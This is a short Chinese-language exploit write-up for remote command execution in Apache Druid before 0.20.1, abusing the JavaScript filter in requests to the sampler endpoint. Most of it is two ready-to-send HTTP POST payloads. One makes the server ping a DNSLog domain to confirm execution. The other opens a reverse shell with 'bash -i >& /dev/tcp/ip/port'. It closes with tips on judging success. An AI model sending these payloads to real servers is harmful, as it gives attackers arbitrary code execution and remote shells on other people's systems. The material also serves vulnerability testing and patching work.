druid 远程命令执行
druid 介绍
Druid是一个专为大型数据集上的高性能切片和OLAP分析而设计的数据存储。Druid最常用作为GUI分析应用程序提供动力的数据存储,或者用作需要快速聚合的高度并发API的后端
影响版本
Apache Druid < 0.20.1
漏洞简介
Apache Druid包括执行用户提供的JavaScript的功能嵌入在各种类型请求中的代码。此功能在用于高信任度环境中,默认已被禁用。但是,在Druid 0.20.0及更低版本中,经过身份验证的用户发送恶意请求,利用Apache Druid漏洞可以执行任意代码。
漏洞复现
-
DNSLog
POST /druid/indexer/v1/sampler HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close { "type": "index", "spec": { "type": "index", "ioConfig": { "type": "index", "firehose": { "type": "local", "baseDir": "quickstart/tutorial/", "filter": "wikiticker-2015-09-12-sampled.json.gz" } }, "dataSchema": { "dataSource": "sample", "parser": { "type": "string", "parseSpec": { "format": "json", "timestampSpec": { "column": "time", "format": "iso" }, "dimensionsSpec": {} } }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 ping 2mp3kb.dnslog.cn')}", "dimension": "added", "": { "enabled": "true" } } } } }, "samplerConfig": { "numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214" } }
-
反弹shell
POST /druid/indexer/v1/sampler HTTP/1.1 Host: ip:port User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 Accept: application/json, text/plain, */* Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Content-Type: application/json Content-Length: 679 Connection: close { "type": "index", "spec": { "type": "index", "ioConfig": { "type": "index", "firehose": { "type": "local", "baseDir": "quickstart/tutorial/", "filter": "wikiticker-2015-09-12-sampled.json.gz" } }, "dataSchema": { "dataSource": "sample", "parser": { "type": "string", "parseSpec": { "format": "json", "timestampSpec": { "column": "time", "format": "iso" }, "dimensionsSpec": {} } }, "transformSpec": { "transforms": [], "filter": { "type": "javascript", "function": "function(value){return java.lang.Runtime.getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >& /dev/tcp/ip/port 0>&1')}", "dimension": "added", "": { "enabled": "true" } } } } }, "samplerConfig": { "numRows": 500, "timeoutMs": 15000, "cacheKey": "4ddb48fdbad7406084e37a1b80100214" } }
返回的状态码为200则为成功。
该漏洞是在认证完之后才可以复现的!!!